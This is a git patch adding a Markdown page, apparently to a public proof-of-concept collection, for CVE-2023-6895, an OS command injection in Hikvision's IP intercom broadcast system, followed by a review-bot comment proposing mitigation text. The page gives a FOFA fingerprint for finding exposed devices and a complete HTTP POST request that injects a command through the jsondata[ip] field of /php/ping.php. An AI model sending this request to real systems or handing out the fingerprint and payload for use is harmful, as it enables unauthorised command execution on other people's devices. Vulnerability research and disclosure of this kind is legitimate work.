From e72500f1e73e46bf9c113114ce54ae9b656d318f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 23 Dec 2023 18:22:05 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=B7=E5=BA=B7=E5=A8=81=E8=A7=86CV?= =?UTF-8?q?E-2023-6895=20IP=E7=BD=91=E7=BB=9C=E5=AF=B9=E8=AE=B2=E5=B9=BF?= =?UTF-8?q?=E6=92=AD=E7=B3=BB=E7=BB=9F=E8=BF=9C=E7=A8=8B=E5=91=BD=E4=BB=A4?= =?UTF-8?q?=E6=89=A7=E8=A1=8C.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...VE-2023-6895 IP网络对讲广播系统远程命令执行.md | 27 +++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md
diff --git a/海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md b/海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md
new file mode 100644
index 0000000..85375c1
--- /dev/null
+++ b/海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md
@@ -0,0 +1,27 @@
+## 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行
+海康威视对讲广播系统3.0.3_20201113_RELEASE(HIK)存在漏洞。它已被宣布为关键。该漏洞影响文件/php/ping.php 的未知代码。使用输入 netstat -ano 操作参数 jsondata[ip] 会导致 os 命令注入。
+
+## fofa
+```
+icon_hash="-1830859634"
+```
+
+## poc
+```
+POST /php/ping.php HTTP/1.1
+Host: xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 45
+Origin: http://xxx.xxx.xxx
+Connection: close
+Referer: http://xxx.xxx.xxx/html/system.html
+X-Forwarded-For: 127.0.0.1
+
+jsondata[type]=3&jsondata[ip]=ipconfig
+```
+![0a7e02e1600a63bf856d6581f918b036](https://github.com/wy876/POC/assets/139549762/7f52597a-bcb4-402e-89fe-c0682cb61d40)
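Review bot: The new page ends at the sample request and the screenshot and gives no detection or remediation guidance, so an operator of an affected 3.0.3_20201113_RELEASE(HIK) system has nothing to act on. I would add a closing section after the `## poc` block, for example `## mitigation`, with text along the lines of `Restrict access to the management web interface, apply the vendor's fixed release, and alert on POST requests to /php/ping.php whose jsondata[ip] value is not a plain IP address or hostname`. The fixed version is not stated on this page and should be cited from the vendor advisory rather than guessed. The description also names `netstat -ano` as the input while the sample body sends `ipconfig`, and the phrases `它已被宣布为关键` and `未知代码` read as machine translation; tidying both would make the stated root cause, an unvalidated `jsondata[ip]` value reaching an OS command, clearer.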